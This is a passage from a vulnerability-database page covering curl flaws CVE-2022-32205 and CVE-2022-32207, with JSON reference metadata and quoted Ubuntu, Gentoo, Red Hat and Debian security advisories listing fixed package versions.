      },
      {
        "db": "JVN",
        "id": "JVNVU99464755",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99752892",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU94715153",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-166-12",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-075-01",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-103-09",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "169318",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6333",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3732",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3117",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.2163",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5300",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3143",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022062927",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022071142",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-424132",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "id": "VAR-202206-1962",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      }
    ],
    "trust": 0.6566514
  },
  "last_update_date": "2025-05-07T20:20:45.117000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SSA-333517",
        "trust": 0.8,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "title": "curl Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=198519"
      },
      {
        "title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32205"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-32205"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1875",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1875"
      },
      {
        "title": "Debian Security Advisories: DSA-5197-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d9b734e3e9b6712333c95a6263dead82"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-206",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-206"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-145",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-145"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/Live-Hack-CVE/CVE-2022-32205 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/holmes-py/reports-summary "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-770",
        "trust": 1.1
      },
      {
        "problemtype": "Allocation of resources without limits or throttling (CWE-770) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://hackerone.com/reports/1569946"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.8,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht213488"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2022/oct/28"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2022/oct/41"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu91561630"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99752892"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu94715153"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99464755"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-349-18"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-075-01"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-103-09"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-166-12"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/167607/ubuntu-security-notice-usn-5495-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022071142"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022062927"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht213488"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169318/debian-security-advisory-5197-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5300"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-32205/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/curl-denial-of-service-via-set-cookie-38670"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3117"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-5495-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/770.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2022-32205"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.19"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22924"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "date": "2022-07-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "date": "2023-09-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "date": "2022-06-28T15:26:16",
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "date": "2022-12-19T13:48:31",
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "date": "2022-08-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "date": "2022-06-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "date": "2022-07-07T13:15:08.277000",
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424132"
      },
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-32205"
      },
      {
        "date": "2023-09-26T06:29:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      },
      {
        "date": "2023-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      },
      {
        "date": "2025-05-05T17:18:12.680000",
        "db": "NVD",
        "id": "CVE-2022-32205"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "curl\u00a0 Vulnerability in resource allocation without restrictions or throttling in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015270"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2562"
      }
    ],
    "trust": 0.6
  }
}

VAR-202206-1963

Vulnerability from variot - Updated: 2025-04-24 23:12

When curl < 7.84.0 saves cookies, alt-svc and hsts data to local files, it makes the operation atomic by finalizing the operation with a rename from a temporary name to the final target file name.In that rename operation, it might accidentally widen the permissions for the target file, leaving the updated file accessible to more users than intended. curl There is a vulnerability in improper default permissions.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ========================================================================== Ubuntu Security Notice USN-5495-1 June 27, 2022

curl vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 22.04 LTS
Ubuntu 21.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in curl. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 21.10, and Ubuntu 22.04 LTS. (CVE-2022-32205)

Harry Sintonen discovered that curl incorrectly handled certain HTTP compressions. An attacker could possibly use this issue to cause a denial of service. (CVE-2022-32206)

Harry Sintonen discovered that curl incorrectly handled certain FTP-KRB messages. An attacker could possibly use this to perform a machine-in-the-diddle attack. (CVE-2022-32208)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.3 libcurl3-gnutls 7.81.0-1ubuntu1.3 libcurl3-nss 7.81.0-1ubuntu1.3 libcurl4 7.81.0-1ubuntu1.3

Ubuntu 21.10: curl 7.74.0-1.3ubuntu2.3 libcurl3-gnutls 7.74.0-1.3ubuntu2.3 libcurl3-nss 7.74.0-1.3ubuntu2.3 libcurl4 7.74.0-1.3ubuntu2.3

Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.12 libcurl3-gnutls 7.68.0-1ubuntu2.12 libcurl3-nss 7.68.0-1ubuntu2.12 libcurl4 7.68.0-1ubuntu2.12

Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.19 libcurl3-gnutls 7.58.0-2ubuntu3.19 libcurl3-nss 7.58.0-2ubuntu3.19 libcurl4 7.58.0-2ubuntu3.19

In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202212-01

                                       https://security.gentoo.org/

Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01

Synopsis

Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.

Background

A command line tool and library for transferring data with URLs.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/curl < 7.86.0 >= 7.86.0

Description

Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.

Impact

Please review the referenced CVE identifiers for details.

Workaround

There is no known workaround at this time.

Resolution

All curl users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"

References

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202212-01

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: curl security update Advisory ID: RHSA-2022:6157-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:6157 Issue date: 2022-08-24 CVE Names: CVE-2022-32206 CVE-2022-32207 CVE-2022-32208 ==================================================================== 1. Summary:

An update for curl is now available for Red Hat Enterprise Linux 9.

Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

Description:

The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.

Security Fix(es):

curl: HTTP compression denial of service (CVE-2022-32206)
curl: Unpreserved file permissions (CVE-2022-32207)
curl: FTP-KRB bad message verification (CVE-2022-32208)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

Bugs fixed (https://bugzilla.redhat.com/):

2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification

Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64: curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm libcurl-devel-7.76.1-14.el9_0.5.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le: curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-devel-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x: curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm libcurl-devel-7.76.1-14.el9_0.5.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64: curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.5.i686.rpm curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm libcurl-devel-7.76.1-14.el9_0.5.i686.rpm libcurl-devel-7.76.1-14.el9_0.5.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source: curl-7.76.1-14.el9_0.5.src.rpm

aarch64: curl-7.76.1-14.el9_0.5.aarch64.rpm curl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.5.aarch64.rpm curl-minimal-7.76.1-14.el9_0.5.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm libcurl-7.76.1-14.el9_0.5.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm libcurl-minimal-7.76.1-14.el9_0.5.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.aarch64.rpm

ppc64le: curl-7.76.1-14.el9_0.5.ppc64le.rpm curl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.5.ppc64le.rpm curl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-minimal-7.76.1-14.el9_0.5.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.ppc64le.rpm

s390x: curl-7.76.1-14.el9_0.5.s390x.rpm curl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm curl-debugsource-7.76.1-14.el9_0.5.s390x.rpm curl-minimal-7.76.1-14.el9_0.5.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm libcurl-7.76.1-14.el9_0.5.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.s390x.rpm libcurl-minimal-7.76.1-14.el9_0.5.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.s390x.rpm

x86_64: curl-7.76.1-14.el9_0.5.x86_64.rpm curl-debuginfo-7.76.1-14.el9_0.5.i686.rpm curl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.5.i686.rpm curl-debugsource-7.76.1-14.el9_0.5.x86_64.rpm curl-minimal-7.76.1-14.el9_0.5.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm libcurl-7.76.1-14.el9_0.5.i686.rpm libcurl-7.76.1-14.el9_0.5.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm libcurl-minimal-7.76.1-14.el9_0.5.i686.rpm libcurl-minimal-7.76.1-14.el9_0.5.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2022-32206 https://access.redhat.com/security/cve/CVE-2022-32207 https://access.redhat.com/security/cve/CVE-2022-32208 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYwZpA9zjgjWX9erEAQjorQ/9G7KqpJrOkRXFM3iFlTVnUV/mGwdu4v5p dru+hce/7sEETk1Er9JXSBIZvtCk31V7QxswgIpgAwCBX/Ie/wr+tosF3jE+4YjL MCgtbk5Tzuak49Gsggz40GbvauEm3NiSyLPmG+A+tWrjqst3UWwobirEg7iVGUU1 OOWKhNPzAr0iWoY1z2EBvBl23Fo8gaMYX9dd8dhcGza2OVMwzywrNW69h6bsQhDp Y5nAyBBCvwosqmDdIzZV5vDQEWoxb5uP+jnRgwtgJpaqdsn+ULkDuShIQZGntdA5 fSCM57aSEmOY0bx/fE3/Z1b8Si3+GJ+j688rSlcRwlaA+Bxo5Az+PUbe4eWwTc2B vstfKWZHPLv/nyq+1JjV7/e+cuwAkn9YsT3/TUPlLtGjmg1x+4wytRXEF3uipFZR P5TJGLIlvaQbnpNfVfkxefCvvGRuomILaP12rRYuKuI1CR+jRLu3jEmFfoSyJs/q WR9OXuSQEFjTmLo3m8S7iRLN6bUWKItYhNmaSucZRgCvayT5BY54GbbssIAykQX8 zLXIbqHQJec8sJuIdSwDSAuxyhrq30kSk0WLpfkK/uw179XpUphNK9CHL7VnGiVj haaef/yP7L12NBguJBmUnYWaWwa3sqepNQ3D8RQYXHrOmQ38VOjL76RQ0URYPkSB pl2iagecnP0=fQUi -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . These flaws may allow remote attackers to obtain sensitive information, leak authentication or cookie header data or facilitate a denial of service attack.

For the stable distribution (bullseye), these problems have been fixed in version 7.74.0-1.3+deb11u2.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
